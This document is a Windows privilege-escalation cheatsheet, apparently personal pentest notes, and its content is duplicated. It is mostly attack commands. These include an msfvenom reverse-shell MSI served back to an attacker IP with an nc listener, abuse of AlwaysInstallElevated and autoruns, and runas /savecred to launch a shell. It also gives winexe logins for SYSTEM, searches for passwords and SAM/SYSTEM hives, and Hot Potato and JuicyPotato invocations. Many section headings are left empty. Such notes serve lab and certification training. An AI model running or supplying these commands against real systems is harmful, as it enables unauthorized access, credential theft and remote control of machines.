Windows

Last updated 7 months ago

Windows

Check user (whoami) and groups (net user <username>)
Run winPEAS with fast, searchfast, and cmd options.
Run Seatbelt & other script as well (PowerUP.ps1, SharpUp, etc)
If your scripts are failing and you don't know why, you can always run the manual commands from this source, and other Windows PrivEsc cheatsheets

Strategy:

Spend some time and read over the result of your enumeration.

if WinPEAS or other tool finds something interesting, make a note of it.

Avoid rabbit holes by creating a checklist of things you need for the priviledge escalation method to work.

Have a quick look around for files in user's desktop and other common location (ex: C:\ and C:\Program Files), Read through interesting files that you find, as they may contain useful information that could help escalate priviledge.

Have a good look at admin processes, enumerate their versions and search for exploits.

check for internal port that you might be able to forward to your attacking machine.

Try things that don't have many steps firs:

registry exploit, services, etc.

If you still don't have an admin shell, re-read your full enumeration dumps and highlight anything that seems odd. This might be a process or file name you aren't familiar with or even a username.
At this stage you can also start to think about Kernel Exploit.

Registry Exploits

Requirement to success:

AutoRuns --> .\winPEASany.exe quite applicationinfo
- search for Autorun Application(T1010)
- check FilePerms: Everyone
- ability to restart
AlwaysInstallElevated
- reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated must set to 1.
- reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstalElevated must set to 1.

AutoRuns

Change the Program.exe to the reverseShell.exe. then restart the computer to get the application run in the

manual check:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# check the directory permission

.\accesschk.exe /accepteula -wvu "<directory>"

AlwaysInstallElevated

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.y LPORT=53 -f msi -o reverse.msi

# nc -lvnp 53

execute the reverse shell:

msiexec /quite /qn /i reverse.msi

Service Exploits

Requirement to success:

Passwords

Requirement to success:

.\winPEASany.exe quite filesinfo userinfo -> search for AutoLogon credentials(T1012)

winexe -U 'admin%password123' //<target ip address> cmd.exe

# nt authority
winexe -U 'admin%password123' --system //<target ip address> cmd.exe

SaveCred

cmdkey /list

# exploit
runas /savecred /user:admin C:\Windows\Tasks\rev.exe

Password in Configuration

.\winPEASany.exe quite cmd searchfast filesinfo

search for --> possible known files that can contain creds(T1083&T1081)

or use this cmd command to find the creds:

dir /s *pass* == *.config

find /si password *.xml *.ini *.txt

SAM/SYSTEM Locations

file location:

dir c:\windows\system32\config

dir c:\windows\repair

dir c:\windows\system32\config\regback

or use winPEAS

.\winPEASany.exe quite cmd searchfast filesinfo

search for --> possible known files that can contain creds(T1083&T1081)

copy file SAM and SYSTEM to kali linux.

Scheduled Tasks

Requirement to success:

Insecure GUI Apps

Requirement to success:

Startup Apps

Requirement to success:

Installed Apps

Requirement to success:

Hot Potato

Requirement to success:

Windows 7,8,10, Server 2008, Server 2012

.\potato.exe -p 10.10.x.y -cmd "C:\Windows\Tasks\rev.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true

Juicy Potato

Requirement to success:

usually a service account
whoami /priv -> SeImpersonatePrivilege Enabled

# .\Juicypotato.exe -l 
.\JuicyPotato.exe -l 1337 -p C:\Windows\Tasks\rev.exe -t * -c <CLSID>

Port Forwarding

Requirement to success:

Kernel Exploits

Requirement to success:

PreviousLinux NextPost Exploit

Last updated 7 months ago

Check user (whoami) and groups (net user <username>)
Run winPEAS with fast, searchfast, and cmd options.
Run Seatbelt & other script as well (PowerUP.ps1, SharpUp, etc)
If your scripts are failing and you don't know why, you can always run the manual commands from this source, and other Windows PrivEsc cheatsheets

Strategy:

Spend some time and read over the result of your enumeration.

if WinPEAS or other tool finds something interesting, make a note of it.

Avoid rabbit holes by creating a checklist of things you need for the priviledge escalation method to work.

Have a good look at admin processes, enumerate their versions and search for exploits.

check for internal port that you might be able to forward to your attacking machine.

Try things that don't have many steps firs:

registry exploit, services, etc.

If you still don't have an admin shell, re-read your full enumeration dumps and highlight anything that seems odd. This might be a process or file name you aren't familiar with or even a username.
At this stage you can also start to think about Kernel Exploit.

Registry Exploits

Requirement to success:

AutoRuns --> .\winPEASany.exe quite applicationinfo
- search for Autorun Application(T1010)
- check FilePerms: Everyone
- ability to restart
AlwaysInstallElevated
- reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated must set to 1.
- reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstalElevated must set to 1.

AutoRuns

Change the Program.exe to the reverseShell.exe. then restart the computer to get the application run in the

manual check:

reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

# check the directory permission

.\accesschk.exe /accepteula -wvu "<directory>"

AlwaysInstallElevated

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.x.y LPORT=53 -f msi -o reverse.msi

# nc -lvnp 53

execute the reverse shell:

msiexec /quite /qn /i reverse.msi

Service Exploits

Requirement to success:

Passwords

Requirement to success:

.\winPEASany.exe quite filesinfo userinfo -> search for AutoLogon credentials(T1012)

winexe -U 'admin%password123' //<target ip address> cmd.exe

# nt authority
winexe -U 'admin%password123' --system //<target ip address> cmd.exe

SaveCred

cmdkey /list

# exploit
runas /savecred /user:admin C:\Windows\Tasks\rev.exe

Password in Configuration

.\winPEASany.exe quite cmd searchfast filesinfo

search for --> possible known files that can contain creds(T1083&T1081)

or use this cmd command to find the creds:

dir /s *pass* == *.config

find /si password *.xml *.ini *.txt

SAM/SYSTEM Locations

file location:

dir c:\windows\system32\config

dir c:\windows\repair

dir c:\windows\system32\config\regback

or use winPEAS

.\winPEASany.exe quite cmd searchfast filesinfo

search for --> possible known files that can contain creds(T1083&T1081)

copy file SAM and SYSTEM to kali linux.

Scheduled Tasks

Requirement to success:

Insecure GUI Apps

Requirement to success:

Startup Apps

Requirement to success:

Installed Apps

Requirement to success:

Hot Potato

Requirement to success:

Windows 7,8,10, Server 2008, Server 2012

.\potato.exe -p 10.10.x.y -cmd "C:\Windows\Tasks\rev.exe" -enable_httpserver true -enable_defender true -enable_spoof true -enable_exhaust true

Juicy Potato

Requirement to success:

usually a service account
whoami /priv -> SeImpersonatePrivilege Enabled

# .\Juicypotato.exe -l 
.\JuicyPotato.exe -l 1337 -p C:\Windows\Tasks\rev.exe -t * -c <CLSID>

Make sure the CLSID is the right one. If stuck, check this out -->

Port Forwarding

Requirement to success:

Kernel Exploits

Requirement to success: